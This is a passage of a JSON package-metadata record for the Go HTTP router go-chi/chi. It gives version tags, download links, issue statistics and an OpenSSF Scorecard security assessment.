ithub/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.162Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":10.15621907339463,"dependent_packages_count":8.491417118260214,"stargazers_count":0.48922415588526874,"forks_count":0.8849354782275465,"docker_downloads_count":null,"average":5.0054489564419145},"purl":"pkg:golang/github.com/go-%21chi/chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-Chi/chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-Chi/chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-Chi/chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4033098,"name":"gopkg.in/chi.v0","ecosystem":"go","description":"","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in","versions_count":1,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_number":"v0.9.0","last_synced_at":"2026-08-12T02:06:22.244Z","created_at":"2022-04-12T09:09:03.919Z","updated_at":"2026-08-12T02:06:22.244Z","registry_url":"https://pkg.go.dev/gopkg.in/chi.v0","install_command":"go get gopkg.in/chi.v0","documentation_url":"https://pkg.go.dev/gopkg.in/chi.v0#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https: